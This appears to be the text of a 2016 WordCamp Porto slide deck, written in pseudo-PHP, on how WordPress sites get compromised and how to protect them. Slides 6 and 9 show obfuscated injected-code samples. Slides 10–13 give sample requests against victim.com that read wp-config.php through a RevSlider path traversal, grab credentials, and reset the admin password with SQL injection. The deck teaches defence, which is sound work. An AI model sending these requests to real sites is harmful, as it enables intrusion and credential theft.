Security and Mobility - WordCamp Porto 2016

1. $talk =“Segurança_e_mobilidade”; $where = date_default_timezone_set(‘Europe/Porto'); $date = '2016-05-14 12:00:00’; start(); /* Início */

2. /* Apresentação */ $who =“Marcel Schmitz”; $role =“CTO + web & mobile developer”; $where =“hellodev.us”; $email =“marcel@hellodev.us”;

3. /* Apresentação */

4. /* Primeiros contactos com sites comprometidos */ -rw-r--r-- 1 root root 3012 May 11 09:59 index.php /* Source: Wordfence March 2016 */

5. /* Primeiros contactos com sites comprometidos */ <?php // Silence is golden.

6. /* Primeiros contactos com sites comprometidos */ <?php // Silence is golden. $x =“NFbkn veorgASDgaskdhfkashdfpwehibvasipdhvaipegaiweHFAPEIgaPIyeiaaipwehgwEG $34h293gHW)EHG(QHgQ(WEGH#$)GhQªGH)EHGQ3223nfk2n3f23nçkfn2ç34”;  $r=eval(gzinﬂate(str_rot13(base64_decode($x))));

7. /* Como uma instalação de WordPress pode ser comprometida */ // RESPONSIBLE FOR 70% OF THE ATTACKS  $ﬁrst =“plugin”; $second =“brute force”; // OTHER 30% $other = array(“code”, ”theme”, ”hosting”, ”ﬁle permissions”); /* Source: Wordfence March 2016 */

8. /* O que fazem depois? */ // MOST OF THEM  $ﬁrst_choice =“deface or take oﬄine”; $second_choice =“send spam”; $third_choice =“seo spam”; $other =“redirect”; /* Source: Wordfence March 2016 */

9. /* Site comprometido por um plugin */ // MOST COMMON METHOD $using_method =“Local File Inclusion (LFI) attack.”; // EXAMPLE - INJECTED CODE <?php ${“Gx4cOx42x41x4cx53"}["x69wirx72x63x66x76"]="x69";${"x47Lx4fx42ALx53"} ["x61rx6bmx64z"]="mx6bx41x72r";${"x47x4cOx42x41x4cS"}["ex6ax71x68x68j x6c"]="x6dx6bx5ftx65x6dp";${"GLOx42x41x4cx53"}["x72x66lx73x65x76x68m x67x68x79"]="x73tx72x69x70Ax72x72";${"Gx4cx4fx42x41x4cx53"}["v x72x72x71x78x6dx6dx77y"]="x63ax74x5fcross";${"x47x4cx4fx42ALx53"} ["x72x73x77x70x61x6cx78tx62x79n"]="tex6dx70lx61te";${"GLx4fx42Ax4cx53"}["g x78x67ycx74x71x73"]="tx69tlx65"; ?>

10. /* Site comprometido por um plugin */ // EXAMPLE - DOWNLOAD WP-CONFIG.PHP FILE - REVSLIDER $wpconfig_content = file_get_contents(“http://victim.com/wp-admin/admin- ajax.php?action=revslider_show_image&img=../wp-config.php”); /* Source: http://finalphoenix.me/ */

11. /* Site comprometido por um plugin */ // EXAMPLE - PHPINFO WITH CONSTANTS OR DOWNLOADING BACKUPS OR UPLOADING FILES $nonce = ﬁle_get_contents(“http://victim.com/wp-admin/admin.php? action=upgrade-plugin”);  $credentials = ﬁle_get_contents(“http://victim.com/wp-admin/admin.php? action=updraft_ajax_handler&nonce=$nonce”); /* Source: http://finalphoenix.me/ */

12. /* Site comprometido por um plugin */ // EXAMPLE - EXECUTING SCRIPTS $script_to_execute =“phpinfo()”;  $content_of_phpinfo = ﬁle_get_contents(“http://victim.com/wp-admin/ admin-post.php?action=wp_ajax_easymedia_imgresize_ajax?imgurl= $script_to_execute”); /* Source: http://finalphoenix.me/ */

13. /* Site comprometido por um plugin */ // EXAMPLE - DATABASE INJECTION (MISSING ASCII TO HTML CODE CONVERSION) $context = … $query_to_inject =“update wp_users set password=md5(‘123’) where id=1”;  $chage_password = ﬁle_get_contents(“http://victim.com/wp-admin/admin.php? page=aiowpsec&tab=tab1&orderby=$query_to_inject”, false, $context); /* Source: http://finalphoenix.me/ */

14. /* Site comprometido por um plugin */ // HOW TO PROTECT AGAINST ATTACKS THROUGH PLUGINS? $simple_solution =“update, update, update!”; $other_tips = array (“dont use old plugins”,“search for news about security issues”,“take a look at the code”);

15. /* Site comprometido por brute force */ // PASSWORD GUESSING ATTACK $tips = array(“dont user obvious usernames”,“dont use simple passwords”,“create a new admin account”);  $how_to_avoid =“two factor authentication”; $other_solution = array(“change /wp-admin”,“blacklist IPs trying to login and failing for more than x times”);

16. /* Site comprometido por outros motivos */ // SET THE CORRECT PERMISSIONS $folders =“0755”; $ﬁles =“0644”; $wp_conﬁg =“0444”; $htaccess =“0444”;

17. /* Site comprometido por outros motivos */ // SET THE CORRECT .HTACCESS CONTENT $things_you_can_do = array(“block IPs”,“protect ﬁles”,“allow certain ﬁle extensions from wp_content/*”);

18. /* Site comprometido por outros motivos */ // HAVE LATEST OS UPDATES INSTALLED if ($i_have_a_server() == true) { update_os(); }

19. /* Atualizar, sempre! */ // UPDATE PLUGINS, UPDATE CORE INSTALATION, UPDATE THEMES $always_update = true;

20. /* Plugins que ajudam */ // SECURITY PLUGINS  install_plugin_by_slug(‘wordfence’); install_plugin_by_slug(‘sucuri-scanner’); install_plugin_by_slug(‘better-wp-security’); // iThemes Security install_plugin_by_slug(‘google-authenticator’);

21. /* A nossa solução, aberta para todos */ // OUR PROBLEMS, YOUR PROBLEMS, SHARING A SOLUTION $new_approach = install_hellosys();

22. // MOBILE APP $name =“HELLOSYS”

23. /* A nossa solução, aberta para todos */ // ENTER BETA, STAY TUNED $url =“http://hellodev.us”;

24. $talk =“Segurança_e_mobilidade”; $where = date_default_timezone_set(‘Europe/Porto'); $date = '2016-05-14 12:20:00’; thank_you(); /* Fim */